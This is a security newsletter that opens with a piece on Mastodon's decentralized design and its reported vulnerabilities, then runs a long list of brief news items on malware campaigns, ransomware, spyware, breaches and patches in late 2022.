Mastodon comes under the security lens
Twitter alternatives have been found to contain several issues
A number of platform changes introduced by Twitter’s chief executive Elon Musk has resulted in users flocking to a decentralized social media service called Mastadon. But the latter’s new-found popularity has also led to researchers uncovering a number of security holes.
But before you migrate, here’s what you need to know. First, setting up an account requires users to choose from a set of servers (or instances), which cater to a wide range of topics. You also have the option to move between instances but it’s possible the same username isn’t available.
That’s because Mastodon follows what’s called a distributed design, also referred to as a fediverse, wherein the ecosystem is built atop a set of interconnected servers. There’s no one central site that contains all of the users’ data.
This also means that rules are not uniformly enforced across the entire platform, with each instance having its own set of policies to define its space, including the default language, content moderation guidelines, topics, and the privacy settings. For instance, sending a direct message to a user on a different server allows the administrators of that server to view the message. It’s also worth noting that the messages are not end-to-end encrypted.
The influx has also prompted the security community to take a closer look at Mastodon, with PortSwigger’s Gareth Heyes discovering that the infosec.exchange instance was affected by an HTML injection vulnerability that could have been exploited to steal users’ browser credentials by exploiting that the service allows users to post HTML.
Another misconfiguration issue in the same instance, which was identified by Lenin Alevski, could have been exploited to download or delete all the files on the server, including files shared through direct messages.
“Whether Mastodon serves to replace or only supplement Twitter, there’s certainly advantages to be had in the platform’s ad-free, decentralized structure, as well as some challenges for both new users and servers,” cybersecurity company SentinelOne noted last month.
In the meantime, another Twitter alternative called Hive that witnessed a surge in users since Musk took over said it’s temporarily shutting down after researchers found vulnerabilities that would have let hackers access DMs and edit others’ Hive posts.
The rapidly growing user base on Mastodon, Hive, and Post further poses security and moderation challenges, not to mention raise questions how these emerging platforms would respond to law enforcement requests for data.
What’s trending in security?
🚨 Microsoft is raising an alarm that systems using the long-discontinued Boa web server could be at risk of cyberattacks on a large scale after a series of intrusion attempts of power grid facilities in India likely included exploiting unpatched security flaws in the technology to deploy the ShadowPad backdoor. Boa is no longer actively maintained as of 2005 but continues to be integrated into popular software developer kits (SDKs) that Internet of Things device developers use in their design of critical components for myriad IoT devices. These include SDKs released by RealTek that are used in SoCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. [The Hacker News / The Record]
↘️ Researchers at the Leiden Institute of Advanced Computer Science found 4,893 repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities discovered in 2017-2021, some of them including malware. “They attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system,” according to the researchers. [ArXiv]
⏫ Microsoft has warned that Cybercrime as a service (CaaS) is a growing and evolving threat to customers worldwide, adding nation state actors are responding by pursuing new and unique tactics to deliver attacks and evade detection. This includes the compromise of IT and firmware supply chains and exploitation of zero-day flaws. “The commoditization of exploits is leading them to come at a much faster rate,” the tech giant said. “Zero-day exploits are often discovered by other actors and reused broadly in a short period of time.” [The Hacker News]
🔗 A booby-trapped VPN application is being used to load spyware on Android devices as part of an operation aimed at Iran’s Baha’i community, a persecuted, Persian-speaking minority group. The campaign is just the latest in a growing list of espionage efforts involving advanced infrastructure and mobile surveillanceware. [The Hacker News]
📱 Almost half of Android-based mobile phones used by U.S. state and local government employees are running outdated versions of the operating system, exposing them to hundreds of vulnerabilities that can be leveraged for attacks. “Because government entities often delay OS updates to test their proprietary apps, it creates a window for attackers to exploit those vulnerabilities,” the report says. ”Some of the potential effects include remote code execution, UI spoofing, and user activity tracking.” [Lookout]
🏦 At least 16 African banks, financial services, and telecommunication companies have been identified as victims of the French-speaking threat group OPERA1ER, which has stolen at least $11 million since 2018. The group doesn’t rely on exotic malware, its hallmark is the use of easily accessible open source malware and everyday red-team frameworks like Metasploit and Cobalt Strike. [The Hacker News]
⚠️ Threat actors are leveraging InterPlanetary File System (IPFS), an emerging distributed file storage protocol that enables computers to store and serve files as part of a peer-to-peer network, in order to host phishing pages and distribute malicious payloads. Content stored within the IPFS network is synchronized across multiple systems participating in the network such that even if it’s removed from one system, it will continue to be accessible as long as there exists one node on the network with a copy of the content, making them impervious to takedowns. [The Hacker News / Decipher]
🌀 The U.S. reissued sanctions on Tornado Cash, accusing the platform of helping North Korean government hackers launder hundreds of millions of dollars to help funds North Korea’s nuclear weapons program. “The use of Tornado Cash to launder stolen funds represents a larger trend by the DPRK regime to resort to illicit activities, including cyber-enabled heists from virtual currency exchanges and financial institutions, to generate revenue for its unlawful WMD and ballistic missile programs,“ the U.S. State Department said. [U.S. State Department]
📧 An Instagram influencer known as “Hushpuppi,” a 40-year-old Nigerian named Ramon Olorunwa Abbas, has been sentenced to 11 years in prison for conspiring to launder tens of millions of USD from business email compromise (BEC) scams and various cyber schemes, including providing assistance to the North Korean hackers following a cyber-heist targeting a bank in Malta in January 2019. Abbas was arrested in Dubai, UAE, in June 2020 and pleaded guilty to money laundering charges in April 2021. [U.S. Department of Justice]
💵 Texas-based IT management solutions provider SolarWinds agreed to pay $26 million to settle a shareholder lawsuit over the data breach disclosed by the company in 2020, the company revealed in a Filing on October 28, 2022. The cyberattack involved Russia-linked threat actors dubbed Nobelium breaching SolarWinds systems as far back as in 2019. The breach, however, only came to light in December 2020. [U.S. Securities and Exchange Commission]
📝 Microsoft subsidiary GitHub has launched private vulnerability reporting capability that allows security researchers to file vulnerabilities directly with maintainers of open source projects. The development comes as the U.S. National Security Agency (NSA) released guidance encouraging organizations to shift programming languages from the likes of C and C++ to memory safe alternatives – namely C#, Rust, Go, Java, Ruby or Swift. [GitHub / NSA]
⤵️ A malicious browser extension that works on both Google Chrome and Microsoft Edge has been found to allow attackers to remotely take over someone’s browser session and carry out a veritable buffet of nefarious activity, including stealing cookies, mining crypto, and installing other malware. Concerningly, the Cloud9 malware is designed to target all browsers and operating systems, making it a broad attack surface. [The Hacker News]
🔓 Google has paid out $70,000 to security researcher David Schütz for privately reporting an “accidental” security bug, a case of local privilege escalation, that allowed anyone to unlock fully patched Google Pixel phones without knowing its passcode. Schütz found that anyone with physical access to a Google Pixel phone could swap in their own SIM card and enter its preset PUK recovery code to bypass the operating system’s lock screen protections. [The Hacker News]
💳 Seven different Magecart groups are taking advantage of a flaw in Magento 2 (CVE-2022-24086, CVSS score: 9.8) to take over vulnerable e-commerce sites as part of an ongoing campaign called TrojanOrder. The issue was patched by Adobe in February 2022. [Sansec]
💰 Russian hacktivists have compromised several organizations in Ukraine with a new ransomware strain called Somnia, amid continuing cyberattacks on the nation. [CERT-UA / BBC]
👀 A new report from The Intercept has revealed details about the Iranian government’s far-reaching digital surveillance tools, uncovering how officials partner with mobile carriers to track cell phone users, and monitor, alter, and disrupt their communications. This includes a tool called SIAM that can be used to “slow their data connections to a crawl, break the encryption of phone calls, track the movements of individuals or large groups, and produce detailed metadata summaries of who spoke to whom, when, and where.” [The Intercept]
🔄 Apple made it official that it commits to fully patching only the latest version of its operating, stating “not all known security issues are addressed in previous versions.” The company uses the term “upgrade” to refer to major OS releases that can add big new features and user interface changes and ”update” to refer to smaller but more frequently released patches that mostly fix bugs and address security problems. [Apple]
👑 A threat actor tracked by Microsoft as DEV-0569 has been linked to a Google Ads campaign designed to deliver artifacts that ultimately enable the deployment of Royal ransomware. The group has drawn attention for its ability to continuously improve its discovery, detection evasion, and post-compromise payloads. In just a few months, the threat actor used a variety of methods, including hiding malicious links on organizations’ contact forms; burying fake installers on legitimate download sites and repositories; and using Google ads in its campaigns to camouflage its malicious activities. [The Hacker News]
📩 Malicious operations using Emotet resumed this month at a high volume, putting an end to a four-month-long hiatus. Emotet was created as a banking trojan in 2014 to steal financial data. But it has since evolved into a malware dropper capable of dropping next-stage payloads. Emotet-laden email samples employ generic lures to trick users into opening sketchy Excel files that activate the killchain. [The Hacker News]
🔑 Threat actors are stealing authentication tokens already verified by multifactor authentication (MFA) to breach organizations’ systems. “By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly,” Microsoft said. [Microsoft]
🚩 Researchers at Unit 221B discovered security vulnerabilities in the encryption mechanism of the Zeppelin ransomware, enabling the recovery of data for close to two-dozen victims without paying the ransom. The ransomware gang “appears to have stopped spreading their ransomware code gradually over the past year,” possibly as a result of its failed encryption. [Unit221B / Krebs on Security]
🪙 James Zhong pled guilty to stealing the 50,000 bitcoins from the Silk Road dark web marketplace before it was busted by U.S. law enforcement in 2013. Zhong exploited a bug in Silk Road’s payments system that allowed him to siphon bitcoin to his wallets. [The Hacker News / WIRED]
🗞️ Details emerged about a mass media compromise that involved an initial access broker, aka TA569, hacking an unnamed media content provider to deploy malware on hundreds of U.S. news outlet websites. The goal of the spray-and-pray supply chain attack is to trick visitors into installing a fake browser update that eventually delivers malware, usually ransomware. [Bleeping Computer]
📶 Ever wonder how it’s like to receive two-factor authentication codes via SMS if you happen to be in Antarctica? Let’s just say, it’s difficult! [brr]
📞 In case you missed it, Facebook has a little-known feature that lets you check if your email address or phone number has been uploaded by someone to the social network, delete it, and then block it from being uploaded again. This is because Facebook lets users sync their phone contacts, which ends up uploading other people’s information without their consent. In a related news, Meta said it disciplined more than two dozen employees and contractors over the past year for illicitly accessing user accounts, in some cases accepting bribes to do so. The development also comes as Facebook is attracting criticism for doing little to help users recover accounts. [The Hacker News]
📍 A stalkerware app called TheTruthSpy is said to have compromised at least 360,000 devices worldwide. The database included GPS location data points, call logs, and text messages. [TechCrunch]
👄 Developers of the open source Matrix messenger protocol have released an update to fix critical end-to-end encryption bugs that undermine its authentication and confidentiality guarantees. The compromise relies on a malicious or compromised server, enabling a “malicious server operator or someone who gains control of a Matrix server to read the messages of users and to impersonate them to each other.” [Ars Technica]
📰 The operators behind the information-stealing malware known as Ducktail have adapted their tactics and malware to avoid detection. The goal of the malware is to hijack Facebook Business accounts associated with individuals in the marketing and advertising sectors. Since a business account can be associated with multiple email addresses with different permission levels, the attack target users with administrator and finance editor roles so as to steal their account information, enabling the actor to add their own email addresses and profit off ads. [The Hacker News]
👾 Attention is being drawn to a new commercial red-teaming tool called Nighthawk, warning that the command-and-control framework is likely to be appropriated by malicious actors, joining the likes of Cobalt Strike, Sliver, and Brute Ratel C4. MDSec said it is not aware of any evidence of illegitimate activity associated with the software, adding it offers a “layered mix of soft and technical controls” to prevent misuse. [The Hacker News]
❗ A growing number of cybercriminal groups are turning to a Go-based information stealer named Aurora to steal data from compromised machines. Also observed in the wild is another stealer called Typhon Reborn, an updated version of a crypto miner and stealer that has been spotted with capabilities to siphon from crypto wallets and evade antivirus products. It’s being sold for $100 for a lifetime license. [The Hacker News]
🕸️ Meta took down a network of phony Facebook and Instagram accounts that promoted pro-U.S. messages abroad by targeting audiences in Afghanistan and Central Asia. The cluster was operated by People associated with the U.S. military but did not attribute it to a specific a U.S. military command. The fraudulent Facebook accounts claimed, among other things, the U.S. was key to the region’s stability, while also raising terrorism concerns in the targeted regions and dispersing posts that against China, Iran, and Russia. [The Hacker News]
💲 The Black Basta ransomware group, one of this year’s most prolific ransomware families, is using Qakbot malware — also known as QBot or Pinkslipbot — to perpetrate an aggressive and widespread campaign targeting U.S. companies. What’s also notable is the swiftness with which the attacks are taking place, with the ransomware deployed in less than half a day. Evidence has recently emerged that the FIN7 group may be backing the criminal gang.
FIN7 is a financially motivated cybercrime organization that is estimated to have stolen well over $1.2 billion since surfacing in 2012. FIN has also been suspected to be linked to DarkSide, BlackMatter, and BlackCat. Analysis of the ransomware activities has revealed a well-organized and well-resourced operator that does not attempt to recruit affiliates, indicating that the threat actor is developing their toolkit in-house and might be collaborating with a small number of affiliates. [The Hacker News]
💥 An analysis of several wiper families that threat actors deployed in various attacks since the start of the year, most of them targeting Ukraine, has found the malware to be an effective tool in cyberattacks regardless of the technical skills of the adversary. “The required time to create such a piece of malware is low, especially when compared to complex espionage backdoors and the often-accompanying vulnerabilities that are used,” researcher Max Kersten said. [Trellix]
🔐 Internet Security Research Group (ISRG), the nonprofit behind Let’s Encrypt, said the open certificate authority (CA) has issued its three billionth certificate this year. More than 309 million domains are being secured using the free service. [ISRG]
🔍 A Spanish IT firm has been seemingly behind an invasive spyware framework called Heliconia that targeted desktop computers, exploiting vulnerabilities in Chrome, Windows Defender, and Firefox to deploy spyware on target devices, including Windows and Linux computers. [The Hacker News / WIRED]
📢 LastPass said it was breached a second time using information obtained during the August intrusion, although it emphasized that user passwords were safe. The new incident at LastPass is an indication that the attackers may have accessed more data from the company in August 2022 than previously thought. [The Hacker News]
🚫 Major web browsers such as Mozilla Firefox and Microsoft Edge said they would stop trusting new certificates issued by TrustCor Systems after an investigation found the company’s links to another firm called Packet Forensics that sells communication interception services to U.S. government agencies. [The Washington Post]
⬇️ Google said the number of memory safety vulnerabilities in Android fell from 223 to 85 between 2019 and 2022, coinciding with its shift from C/C++ to Rust in Android 13. [Security Blog]
🌐 SocGholish, a malicious JavaScript malware that’s distributed by drive-by downloads to compromised, but otherwise legitimate, websites, is masquerade as fake browser updates that, when downloaded, launches a malicious payload for follow-on attacks. It’s attributed to a threat actor tracked as TA569. “Regardless of the victim’s profile, TA569 is extremely aggressive in deploying follow-on malware leading to a remarkably low dwell time,” researchers say. [Proofpoint / Sucuri]
❌ A sophisticated threat actor named “CashRewindo” has taken an unusually crafty approach by using a technique called domain aging in global malvertising campaigns that lead to investment scam sites. Domain aging is a method where threat actors register domains and wait years (in this case, two) to use them, hoping to bypass security platforms. [Confiant]
🔓 A trojanized variant of a legitimate open source application called ResignTool, which is used to change the signing information on .ipa archive files, has been found to steal iCloud Keychain data from macOS systems, including passwords, private keys, and certificates. [Trend Micro]